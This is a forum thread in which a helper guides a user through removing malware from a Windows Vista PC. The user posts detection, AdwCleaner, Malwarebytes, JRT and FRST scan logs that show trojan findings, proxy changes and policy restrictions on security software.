Detection, 06.12.2014 09:21:44, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:21:50, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:22:18, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:22:21, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:22:35, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:23:20, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:23:31, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:23:34, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:23:52, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:23:59, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:23:59, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:24:03, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:24:08, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:24:18, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:24:23, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, IP, 88.214.193.211, 52561, Outbound, C:\Windows\explorer.exe, 
Detection, 06.12.2014 09:24:56, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:24:59, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Detection, 06.12.2014 09:25:32, SYSTEM, FINJA-PC, Protection, Malware Protection, File, Trojan.FakeMS.ED, C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll, Quarantine Failed, 303, Queued for removal on reboot, [5e3f2a354f2d83b3151d935b1fe244bc]
Protection, 06.12.2014 09:25:44, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, Stopping, 
Protection, 06.12.2014 09:25:44, SYSTEM, FINJA-PC, Protection, Malicious Website Protection, Stopped, 
Protection, 06.12.2014 09:25:44, SYSTEM, FINJA-PC, Protection, Malware Protection, Stopping, 
Protection, 06.12.2014 09:25:44, SYSTEM, FINJA-PC, Protection, Malware Protection, Stopped, 
Protection, 06.12.2014 10:25:22, SYSTEM, FINJA-PC, Protection, Malware Protection, Starting, 
Protection, 06.12.2014 10:25:22, SYSTEM, FINJA-PC, Protection, Malware Protection, Started, 

(end)
         
Many thanks in advance for the help that is sure to follow!

Alt 06.12.2014, 15:17   #2
Machiavelli
 



Step 1
Please download AdwCleaner to your desktop.
  • Close all open programs and browsers. Illustrated guide to AdwCleaner.
  • Start AdwCleaner.exe with a double-click.
  • Accept the terms of use.
  • Click Options and make sure the following items are selected:
    • Delete "Tracing" keys
    • Reset Winsock settings
    • Reset proxy settings
    • Reset Internet Explorer policies
    • Reset Chrome policies
    • Make sure all 5 options are selected as shown here
  • Click Scan and wait until it has finished.
  • Now click Clean and confirm any prompts that appear with OK.
  • Your computer will be restarted automatically. After the restart a text file opens. Post its contents in your next reply.
  • You can also find the log file at C:\AdwCleaner\AdwCleaner[Cx].txt (x = sequential number).


Step 2
Please download Malwarebytes Anti-Malware
  • Install the program to the default path. (Illustrated guide to MBAM)
  • Start Malwarebytes' Anti-Malware (MBAM).
  • Then click Scan, select Threat Scan and click Start Scan.
  • At the end of the scan, have all findings (if any) moved to quarantine. To do so, click Remove Selected.
  • Let your computer restart if necessary to complete the cleanup.
  • Start MBAM, click History and then Application Logs.
  • Select the latest scan log and click Export. Choose Text file (.txt) and save the file as mbam.txt on the desktop. You can find the MBAM log file here.
  • Add the contents of mbam.txt to your next reply.



Step 3

Please close your protection software to avoid possible conflicts.
Please download Junkware Removal Tool to your desktop

  • Start the tool with a double-click. On Windows Vista (or higher), please start it via right-click "Run as administrator".
  • Press any key to start the tool.
  • Depending on the system, the scan may take a while.
  • When the tool has finished, the log file (JRT.txt) is saved to the desktop and opened automatically.
  • Please post the contents of JRT.txt in your next reply.



Step 4
Please start FRST again, also tick the box for Addition.txt and click Scan.

Please post the contents of the logs from AdwCleaner, MBAM, JRT and FRST here in the thread.

Alt 06.12.2014, 16:38   #3
sbr_vfb
 



Thanks for the reply. Here are the logs:

AdwCleaner:
Code:
# AdwCleaner v4.104 - Bericht erstellt am 06/12/2014 um 15:37:24
# Aktualisiert 05/12/2014 von Xplode
# Database : 2014-12-03.1 [Live]
# Betriebssystem : Windows Vista (TM) Home Premium Service Pack 2 (32 bits)
# Benutzername : finja - FINJA-PC
# Gestartet von : C:\Users\finja\Desktop\AdwCleaner_4.104.exe
# Option : Löschen

***** [ Dienste ] *****


***** [ Dateien / Ordner ] *****


***** [ Tasks ] *****


***** [ Verknüpfungen ] *****


***** [ Registrierungsdatenbank ] *****


***** [ Browser ] *****

-\\ Internet Explorer v9.0.8112.16592


-\\ Mozilla Firefox v


*************************

AdwCleaner[R0].txt - [33470 octets] - [13/11/2014 13:15:26]
AdwCleaner[R1].txt - [1181 octets] - [13/11/2014 13:24:49]
AdwCleaner[R2].txt - [1250 octets] - [27/11/2014 21:14:54]
AdwCleaner[R3].txt - [2473 octets] - [05/12/2014 21:07:25]
AdwCleaner[R4].txt - [1195 octets] - [06/12/2014 15:35:34]
AdwCleaner[S0].txt - [32229 octets] - [13/11/2014 13:17:56]
AdwCleaner[S1].txt - [1311 octets] - [27/11/2014 21:18:12]
AdwCleaner[S2].txt - [2538 octets] - [05/12/2014 21:09:29]
AdwCleaner[S3].txt - [1117 octets] - [06/12/2014 15:37:24]

########## EOF - C:\AdwCleaner\AdwCleaner[S3].txt - [1177 octets] ##########
         
MBAM:
Code:
 Malwarebytes Anti-Malware 
www.malwarebytes.org

Suchlauf Datum: 06.12.2014
Suchlauf-Zeit: 15:44:20
Logdatei: mbam.txt
Administrator: Ja

Version: 2.00.4.1028
Malware Datenbank: v2014.12.06.05
Rootkit Datenbank: v2014.12.03.01
Lizenz: Testversion
Malware Schutz: Aktiviert
Bösartiger Webseiten Schutz: Aktiviert
Selbstschutz: Deaktiviert

Betriebssystem: Windows Vista Service Pack 2
CPU: x86
Dateisystem: NTFS
Benutzer: finja

Suchlauf-Art: Bedrohungs-Suchlauf
Ergebnis: Abgeschlossen
Durchsuchte Objekte: 294475
Verstrichene Zeit: 23 Min, 29 Sek

Speicher: Aktiviert
Autostart: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Aktiviert
PUM: Aktiviert

Prozesse: 1
Trojan.Clicker, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe, 3260, Löschen bei Neustart, [336ac09f7a02d36315aa17d5c63bc33d]

Module: 0
(Keine schädliche Elemente erkannt)

Registrierungsschlüssel: 0
(Keine schädliche Elemente erkannt)

Registrierungswerte: 0
(Keine schädliche Elemente erkannt)

Registrierungsdaten: 0
(Keine schädliche Elemente erkannt)

Ordner: 0
(Keine schädliche Elemente erkannt)

Dateien: 1
Trojan.Clicker, C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe, Löschen bei Neustart, [336ac09f7a02d36315aa17d5c63bc33d], 

Physische Sektoren: 0
(Keine schädliche Elemente erkannt)


(end)
         
JRT:
Code:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.4.0 (11.29.2014:1)
OS: Windows Vista (TM) Home Premium x86
Ran by finja on 06.12.2014 at 16:15:07,90
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values



~~~ Registry Keys



~~~ Files



~~~ Folders



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 06.12.2014 at 16:21:52,77
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         
FRST:

FRST Logfile:
Code:
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 03-12-2014
Ran by finja (administrator) on FINJA-PC on 06-12-2014 16:31:24
Running from C:\Users\finja\Desktop
Loaded Profile: finja (Available profiles: finja)
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: Deutsch (Deutschland)
Internet Explorer Version 9
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
() C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe
(InterVideo) C:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exe
(Hewlett-Packard Company) C:\Program Files\Common Files\LightScribe\LSSrvc.exe
(Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbamservice.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Malwarebytes Corporation) C:\Program Files\ Malwarebytes Anti-Malware \mbam.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Dritek System Inc.) C:\Program Files\Launch Manager\LManager.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(1und1 Mail und Media GmbH) C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Microsoft Corporation) C:\Windows\System32\conime.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-21] (Microsoft Corporation)
HKLM\...\Run: [LManager] => C:\Program Files\Launch Manager\LManager.exe [768520 2008-07-25] (Dritek System Inc.)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [159744 2007-07-21] (Alps Electric Co., Ltd.)
HKLM\...\Run: [WarReg_PopUp] => C:\Program Files\eMachines\WR_PopUp\WarReg_PopUp.exe [49152 2008-05-09] (eMachines)
HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [974432 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [eRecoveryService] => [X]
HKLM\...\Run: [MailCheck IE Broker] => C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck_Broker.exe [2135104 2014-11-17] (1und1 Mail und Media GmbH)
HKLM Group Policy restriction on software: C:\Program Files\Common Files\Symantec Shared <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Symantec <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0
HKLM\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-21] (Microsoft Corporation)
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Policies\Explorer: [TaskbarNoNotification] 0
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: F - F:\LaunchU3.exe -a
HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\MountPoints2: I - I:\LaunchU3.exe -a
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKU\S-1-5-21-717213786-2690546565-922636609-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
ProxyServer: [.DEFAULT] => http=127.0.0.1:53278;https=127.0.0.1:53278
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://suche.web.de/webhp?src=br_startpage_ie
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
SearchScopes: HKLM -> DefaultScope {006ee092-9658-4fd6-bd8e-a21a348e59f5} URL = 
SearchScopes: HKLM -> {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACEW
SearchScopes: HKU\.DEFAULT -> {31BB071C-45F4-4DAD-BF5E-AD495B3B2FC8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin
SearchScopes: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> DefaultScope {0DE76405-1CA2-4197-98FF-E6340A0B93E8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin
SearchScopes: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> {0DE76405-1CA2-4197-98FF-E6340A0B93E8} URL = hxxp://suche.web.de/search/web/?su={searchTerms}&origin=searchplugin
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files\Windows Live\Companion\companioncore.dll (Microsoft Corporation)
BHO: WEB.DE MailCheck BHO -> {BF42D4A8-016E-4fcd-B1EB-837659FD77C6} -> C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck.dll (1und1 Mail und Media GmbH)
Toolbar: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> No Name - {FA23121F-EE7C-4BD8-8C06-123D087282C5} -  No File
Toolbar: HKU\S-1-5-21-717213786-2690546565-922636609-1000 -> No Name - {F2413FFA-9DCC-48B3-A09A-625F44D7FA96} -  No File
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll (Microsoft Corporation)
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - c:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll (Microsoft Corporation)
Handler: webde - {8FAF0273-9CA8-4efc-9536-1E35E254D5CD} - C:\Program Files\WEB.DE MailCheck\IE\WEB.DE_MailCheck.dll (1und1 Mail und Media GmbH)
Tcpip\Parameters: [DhcpNameServer] 192.168.179.1

FireFox:
========
FF ProfilePath: C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default
FF NetworkProxy: "http", "127.0.0.1"
FF NetworkProxy: "http_port", 38159
FF NetworkProxy: "no_proxies_on", "localho,t,127.0.0.1,*origin.com,*ea.com,*akamaihd.net"
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_189.dll ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-717213786-2690546565-922636609-1000: @lightspark.github.com/Lightspark;version=1 -> C:\Program Files\Lightspark 0.5.3-git\nplightsparkplugin.dll No File
FF SearchPlugin: C:\Program Files\mozilla firefox\searchplugins\webssearches.xml
FF Extension: 06997db0c0274d5fbd37b0d9230226ea - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{06997db0-c027-4d5f-bd37-b0d9230226ea} [2014-11-06]
FF Extension: Microsoft .NET Framework Assistant - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b}.xpi [2014-11-04]
FF Extension: PriceFountain - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\Extensions\{b6a94784-0ffb-4121-88c6-435139067ee2}.xpi [2014-11-06]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-16]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\tylerkeith11@aol.com [Not Found]
FF Extension: No Name - C:\Users\finja\AppData\Roaming\Mozilla\Firefox\Profiles\jqycb923.default\extensions\{9015bae7-cdbb-4473-a5d0-ecfa559b2ca5}.xpi [Not Found]
FF Extension: No Name - C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [Not Found]
FF Extension: No Name - {9015bae7-cdbb-4473-a5d0-ecfa559b2ca5} [Not Found]
FF Extension: No Name - 1c021e811b224beba7ca0a1c@13f4ea57cb304bae95228b2f9e68.com [Not Found]
FF Extension: No Name - 3c8f3083-413b-4aa6-ad29-fb93d8982e80@gmail.com [Not Found]
FF Extension: No Name - tylerkeith11@aol.com [Not Found]
FF Extension: No Name - ae890d63edd74e6c8739fc18@c5d8be9efbac4fe184bfab.com [Not Found]
FF StartMenuInternet: FIREFOX.EXE - firefox.exe

Chrome: 
=======
CHR StartMenuInternet: Google Chrome - chrome.exe

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 ETService; C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe [24576 2008-06-11] () [File not signed]
R2 LightScribeService; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [61440 2007-01-17] (Hewlett-Packard Company) [File not signed]
R2 MBAMScheduler; C:\Program Files\ Malwarebytes Anti-Malware \mbamscheduler.exe [1871160 2014-11-21] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files\ Malwarebytes Anti-Malware \mbamservice.exe [969016 2014-11-21] (Malwarebytes Corporation)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22192 2014-08-22] (Microsoft Corporation)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2009-05-14] (Hewlett-Packard) [File not signed]
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [288120 2014-08-22] (Microsoft Corporation)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2009-05-14] (Hewlett-Packard) [File not signed]
S2 compilerehtraceProt.exe; C:\Users\finja\AppData\Local\compilerehtraceProt\compilerehtraceProt.exe [X]
S2 evrtspkgBckp.exe; C:\Users\finja\AppData\Local\evrtspkgBckp\evrtspkgBckp.exe [X]
S2 FrozenGNUThumbnail.exe; C:\Users\finja\AppData\Local\FrozenGNUThumbnail\FrozenGNUThumbnail.exe [X]
S2 FrozenSambaWindows.exe; C:\Users\finja\AppData\Local\FrozenSambaWindows\FrozenSambaWindows.exe [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 DritekPortIO; C:\Program Files\Launch Manager\DPortIO.sys [20112 2006-11-02] (Dritek System Inc.)
S3 grmnusb; C:\Windows\System32\drivers\grmnusb.sys [15720 2012-04-18] (GARMIN Corp.)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [35992 2014-12-05] ()
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [23256 2014-11-21] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-12-06] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [51928 2014-11-21] (Malwarebytes Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [231800 2014-07-17] (Microsoft Corporation)
S3 USB_RNDIS; C:\Windows\System32\DRIVERS\usb8023.sys [15872 2013-02-12] (Microsoft Corporation)
S3 BS2521310881; \??\C:\Users\finja\AppData\Local\Temp\NTFS.sys [X]
S3 IntcAzAudAddService; system32\drivers\RTKVHDA.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-12-06 16:21 - 2014-12-06 16:21 - 00000634 _____ () C:\Users\finja\Desktop\JRT.txt
2014-12-06 15:41 - 2014-12-06 15:41 - 00001257 _____ () C:\Users\finja\Desktop\AdwCleaner[S3].txt
2014-12-06 15:36 - 2014-12-06 15:36 - 01707646 _____ (Thisisu) C:\Users\finja\Desktop\JRT.exe
2014-12-06 15:35 - 2014-12-06 15:35 - 02153472 _____ () C:\Users\finja\Desktop\AdwCleaner_4.104.exe
2014-12-06 10:28 - 2014-12-06 16:14 - 00001435 _____ () C:\Users\finja\Desktop\mbam.txt
2014-12-06 10:23 - 2014-12-06 10:24 - 00018716 _____ () C:\Users\finja\Desktop\gmer.txt
2014-12-06 09:22 - 2014-12-06 09:23 - 00028694 _____ () C:\Users\finja\Desktop\Addition.txt
2014-12-06 09:22 - 2014-12-06 09:22 - 00380416 _____ () C:\Users\finja\Desktop\v5shw8ku.exe
2014-12-06 09:20 - 2014-12-06 16:31 - 00015281 _____ () C:\Users\finja\Desktop\FRST.txt
2014-12-06 09:20 - 2014-12-06 16:31 - 00000000 ____D () C:\FRST
2014-12-06 09:19 - 2014-12-06 09:19 - 01110016 _____ (Farbar) C:\Users\finja\Desktop\FRST.exe
2014-12-06 09:18 - 2014-12-06 09:18 - 00000472 _____ () C:\Users\finja\Desktop\defogger_disable.log
2014-12-06 09:18 - 2014-12-06 09:18 - 00000000 _____ () C:\Users\finja\defogger_reenable
2014-12-06 09:17 - 2014-12-06 09:17 - 00050477 _____ () C:\Users\finja\Desktop\Defogger.exe
